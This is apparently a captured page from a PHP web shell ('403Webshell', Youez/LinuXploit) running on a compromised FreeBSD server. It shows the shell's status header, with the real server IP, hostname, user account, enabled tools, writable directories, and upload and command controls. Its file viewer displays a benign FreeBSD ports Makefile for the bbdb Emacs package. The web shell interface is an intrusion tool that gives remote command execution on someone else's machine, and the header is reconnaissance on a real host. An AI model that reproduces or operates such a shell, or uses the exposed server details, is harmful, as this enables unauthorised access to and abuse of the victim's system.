403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/databases/bbdb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/databases/bbdb/Makefile
PORTNAME=	bbdb
DISTVERSIONPREFIX=	v
DISTVERSION=	3.2.2a
PORTREVISION=	2
CATEGORIES=	databases elisp
PKGNAMESUFFIX=	${EMACS_PKGNAMESUFFIX}

MAINTAINER=	emacs@FreeBSD.org
COMMENT=	Big Brother Database
WWW=		https://savannah.nongnu.org/projects/bbdb/

LICENSE=	GPLv3+

BUILD_DEPENDS=	texi2dvi:print/texinfo

USES=		autoreconf emacs
USE_GITHUB=	yes
GH_ACCOUNT=	emacsmirror
GH_TAGNAME=	a50c89a

BBDB_LISPDIR=	${EMACS_SITE_LISPDIR}/${PORTNAME}
GNU_CONFIGURE=	yes

CONFLICTS_INSTALL=	bbdb bbdb-emacs_* # share/doc/bbdb/bbdb.pdf

# Do not install the info file.  Upstream has yet to add any real content to it.
#INFO=		bbdb
PORTDOCS=	bbdb.pdf
NO_ARCH=	yes
PLIST_SUB+=	BBDB_LISPDIR=${BBDB_LISPDIR}

OPTIONS_DEFINE=	DOCS
DOCS_USE=	TEX=latex:build
DOCS_CONFIGURE_ENABLE=	docs

# See http://lists.nongnu.org/archive/html/bbdb-user/2018-11/msg00003.html
.if ${FLAVOR:U} != devel_full && ${FLAVOR:U} != devel_nox
post-configure:
	${REINPLACE_CMD} -e '/[[:blank:]]*--eval '\''(setq byte-compile-dest-file-function (lambda (_) "$$@"))'\'' \\/d' \
		${WRKSRC}/lisp/Makefile
.endif

do-install:
	@${MKDIR} ${STAGEDIR}${PREFIX}/${BBDB_LISPDIR}
	${INSTALL_DATA} ${WRKSRC}/lisp/*.el ${WRKSRC}/lisp/*.elc \
		${STAGEDIR}${PREFIX}/${BBDB_LISPDIR}
# Do not install the info file.  Upstream has yet to add any real content to it.
#	${INSTALL_DATA} ${WRKSRC}/doc/${PORTNAME}.info \
#		${STAGEDIR}${PREFIX}/${INFO_PATH}

do-install-DOCS-on:
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
	${INSTALL_DATA} ${WRKSRC}/doc/bbdb.pdf ${STAGEDIR}${DOCSDIR}

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit